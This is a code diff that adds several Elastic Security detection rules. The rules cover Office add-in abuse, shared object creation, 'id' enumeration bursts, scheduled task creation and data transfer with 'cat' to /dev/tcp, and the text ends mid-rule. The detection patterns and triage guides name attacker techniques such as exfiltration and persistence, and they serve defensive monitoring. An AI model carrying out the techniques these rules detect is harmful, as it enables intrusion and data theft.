+ "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ae8a142c-6a1d-4918-bea7-0b617e99ecfa", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/", + "subtechnique": [ + { + "id": "T1137.006", + "name": "Add-ins", + "reference": "https://attack.mitre.org/techniques/T1137/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "ae8a142c-6a1d-4918-bea7-0b617e99ecfa_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_5.json b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_5.json new file mode 100644 index 00000000000..ac610e53e7a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_5.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of common Microsoft Office applications to launch an Office Add-In from a suspicious path or with an unusual parent process. This may indicate an attempt to get initial access via a malicious phishing MS Office Add-In.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution via Microsoft Office Add-Ins", + "query": "process where \n \n host.os.type == \"windows\" and event.type == \"start\" and \n \n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSACCESS.EXE\", \"VSTOInstaller.exe\") and \n \n process.args regex~ \"\"\".+\\.(wll|xll|ppa|ppam|xla|xlam|vsto)\"\"\" and \n \n /* Office Add-In from suspicious paths */\n (process.args :\n (\"?:\\\\Users\\\\*\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\Rar$*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\BNZ.*\",\n \"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\*\",\n \"?:\\\\Users\\\\Public\\\\*\",\n \"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Windows\\\\Temp\\\\*\",\n \"\\\\Device\\\\*\",\n \"http*\") or\n\t \n process.parent.name : (\"explorer.exe\", \"OpenWith.exe\") or \n \n /* Office Add-In from suspicious parent */\n process.parent.name : (\"cmd.exe\", \"powershell.exe\")) and\n\t \n /* False Positives */\n not (process.args : \"*.vsto\" and\n process.parent.executable :\n (\"?:\\\\Program Files\\\\Logitech\\\\LogiOptions\\\\PlugInInstallerUtility*.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptions\\\\Plugins\\\\VSTO\\\\*\\\\VSTOInstaller.exe\",\n \"?:\\\\Program Files\\\\Logitech\\\\LogiOptions\\\\PlugInInstallerUtility.exe\",\n \"?:\\\\Program Files\\\\LogiOptionsPlus\\\\PlugInInstallerUtility*.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptionsPlus\\\\Plugins\\\\VSTO\\\\*\\\\VSTOInstaller.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\VSTO\\\\*\\\\VSTOInstaller.exe\")) and\n not (process.args : \"/Uninstall\" and process.name : \"VSTOInstaller.exe\") and\n not (process.parent.name : \"rundll32.exe\" and\n process.parent.args : \"?:\\\\WINDOWS\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\") and\n not (process.name : \"VSTOInstaller.exe\" and process.args : \"https://dl.getsidekick.com/outlook/vsto/Sidekick.vsto\")\n", + "references": [ + "https://github.com/Octoberfest7/XLL_Phishing", + "https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ae8a142c-6a1d-4918-bea7-0b617e99ecfa", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/", + "subtechnique": [ + { + "id": "T1137.006", + "name": "Add-ins", + "reference": "https://attack.mitre.org/techniques/T1137/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "ae8a142c-6a1d-4918-bea7-0b617e99ecfa_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_7.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_7.json new file mode 100644 index 00000000000..60dfc020829 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_7.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Shared Object Created or Changed by Previously Unknown Process", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Shared Object Created or Changed by Previously Unknown Process\n\nA shared object file is a compiled library file (typically with a .so extension) that can be dynamically linked to executable programs at runtime, allowing for code reuse and efficient memory usage. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime.\n\nMalicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data.\n\nThis rule monitors the creation of shared object files by previously unknown processes through the usage of the new terms rule type.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the shared object that was created or modified through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE path = {{file.path}}\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:linux and event.action:(creation or file_create_event or file_rename_event or rename) and \nfile.path:(/dev/shm/* or /usr/lib/*) and file.extension:so and process.name:* and not (\n process.name:(\"dockerd\" or \"dpkg\" or \"rpm\" or \"snapd\" or \"yum\" or \"vmis-launcher\" or \"pacman\" or\n \"apt-get\" or \"dnf\" or \"podman\" or \"platform-python\") or \n (process.name:vmware-install.pl and file.path:/usr/lib/vmware-tools/*)\n)\n", + "references": [ + "https://threatpost.com/sneaky-malware-backdoors-linux/180158/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "aebaa51f-2a91-4f6a-850b-b601db2293f4", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 7 + }, + "id": "aebaa51f-2a91-4f6a-850b-b601db2293f4_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_4.json b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_4.json new file mode 100644 index 00000000000..f4d6e794c9e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_4.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for a sequence of 20 \"id\" command executions within 1 second by the same parent process. This behavior is unusual, and may be indicative of the execution of an enumeration script such as LinPEAS or LinEnum. These scripts leverage the \"id\" command to enumerate the privileges of all users present on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual User Privilege Enumeration via id", + "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name == \"id\" and process.args_count == 2 and \n not (process.parent.name == \"rpm\" or process.parent.args : \"/var/tmp/rpm-tmp*\")] with runs=20\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "afa135c0-a365-43ab-aa35-fd86df314a47", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "afa135c0-a365-43ab-aa35-fd86df314a47_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_106.json b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_106.json new file mode 100644 index 00000000000..07ebcdade4e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_106.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Indicates the creation of a scheduled task. Adversaries can use these to establish persistence, move laterally, and/or escalate privileges.", + "false_positives": [ + "Legitimate scheduled tasks may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Local Scheduled Task Creation", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type != \"end\" and\n ((process.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") or\n process.pe.original_file_name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\",\n \"winrshost.exe\")) or\n ?process.code_signature.trusted == false)] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"schtasks.exe\" or process.pe.original_file_name == \"schtasks.exe\") and\n process.args : (\"/create\", \"-create\") and process.args : (\"/RU\", \"/SC\", \"/TN\", \"/TR\", \"/F\", \"/XML\") and\n /* exclude SYSTEM Integrity Level - look for task creations by non-SYSTEM user */\n not (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\")\n ] by process.parent.entity_id\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "afcce5ad-65de-4ed2-8516-5e093d3ac99a", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "afcce5ad-65de-4ed2-8516-5e093d3ac99a_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_107.json b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_107.json new file mode 100644 index 00000000000..8980f764932 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_107.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Indicates the creation of a scheduled task. Adversaries can use these to establish persistence, move laterally, and/or escalate privileges.", + "false_positives": [ + "Legitimate scheduled tasks may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Local Scheduled Task Creation", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type != \"end\" and\n ((process.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") or\n process.pe.original_file_name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\",\n \"winrshost.exe\")) or\n ?process.code_signature.trusted == false)] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"schtasks.exe\" or process.pe.original_file_name == \"schtasks.exe\") and\n process.args : (\"/create\", \"-create\") and process.args : (\"/RU\", \"/SC\", \"/TN\", \"/TR\", \"/F\", \"/XML\") and\n /* exclude SYSTEM Integrity Level - look for task creations by non-SYSTEM user */\n not (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\")\n ] by process.parent.entity_id\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "afcce5ad-65de-4ed2-8516-5e093d3ac99a", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "afcce5ad-65de-4ed2-8516-5e093d3ac99a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_5.json b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_5.json new file mode 100644 index 00000000000..71b9348ebfc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_5.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Activity Detected via cat", + "note": "## Triage and analysis\n\n### Investigating Network Activity Detected via cat\n\nAttackers may leverage the `cat` utility in conjunction with a listener to read all bytes of a file, and output the content to a `/dev/tcp` or `/dev/udp` channel to transfer/exfiltrate file contents to a remote system. \n\nThis rule looks for a sequence of a `cat` execution event followed by a network connection attempt by the same `cat` process. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic 